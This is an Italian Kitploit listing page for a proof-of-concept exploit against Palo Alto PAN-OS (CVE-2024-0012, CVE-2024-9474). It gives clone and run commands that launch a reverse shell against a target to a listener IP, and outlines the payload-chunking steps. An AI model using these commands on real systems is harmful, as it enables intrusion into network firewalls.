Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — Questa PoC è mirata alle vulnerabilità in Palo Alto PAN-OS, in particolare CVE-2024-0012 e CVE-2024-9474. Questo script automatizza il processo di sfruttamento, inclusa la creazione del payload, la consegna in blocchi e l'esecuzione senza interruzioni dei comandi. | Kitploit
Strumenti/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

Questa PoC è mirata alle vulnerabilità in Palo Alto PAN-OS, in particolare CVE-2024-0012 e CVE-2024-9474. Questo script automatizza il processo di sfruttamento, inclusa la creazione del payload, la consegna in blocchi e l'esecuzione senza interruzioni dei comandi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
8521 anno faNon ancora revisionato
Condividi

🚀 Exploit CVE-2024-0012 e CVE-2024-9474 (Palo Alto PAN-OS) 🔐

Palo Alto PAN-OS Exploit Type

🛡️ Descrizione

Questo script Proof-of-Concept (PoC) prende di mira le vulnerabilità in Palo Alto PAN-OS, in particolare CVE-2024-0012 e CVE-2024-9474, automatizzando il processo di sfruttamento, inclusi il bypass dell'autenticazione, la creazione del payload, la consegna in chunk e l'esecuzione di comandi senza interruzioni.

⚠️ Questo script è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. L'uso non autorizzato è illegale.


🔍 Vulnerabilità Affrontate

CVE-2024-0012

  • Tipo: Bypass dell'autenticazione
  • Impatto: Consente l'accesso non autorizzato alle interfacce amministrative.
  • Gravità: 🚨 Critico

CVE-2024-9474

  • Tipo: Esecuzione di comandi e scalata dei privilegi
  • Impatto: Permette a un attaccante remoto di eseguire comandi arbitrari.
  • Gravità: 🔥 Media

🧑‍💻 Utilizzo

🛠️ Clona il Repository

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 Esegui lo Script

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Argomenti:

  • <TARGET_URL>: L'URL del target, includendo http o https.
  • <LISTENER_IP>: Il tuo indirizzo IP per il listener della reverse shell.
  • <LISTENER_PORT>: La porta per il listener della reverse shell.

💡 Esempio

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 Demo dell'Exploit

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ Come Funziona

Ottieni la spiegazione completa e gli approfondimenti tecnici su questo PoC da questo Articolo su Medium!

  1. 🔍 Verifica la Vulnerabilità: Assicura che il target sia vulnerabile a CVE-2024-0012 e CVE-2024-9474.
  2. 🛡️ Estrae PHPSESSID: Recupera un ID di sessione per ulteriore sfruttamento.
  3. ✨ Genera il Payload: Crea un payload di reverse shell doppiamente codificato.
  4. 📦 Carica i Chunk: Invia i chunk del payload al server target.
  5. 🔗 Combina il Payload: Ricostruisce il payload sul sistema target.
  6. ⚡ Esegue il Comando: Decodifica ed esegue la reverse shell.

⚠️ Dichiarazione di Non Responsabilità

Questo PoC è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato di questo strumento è severamente vietato. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.


🧑‍🎓 Autore

ghostxploiter

Scarica lo strumento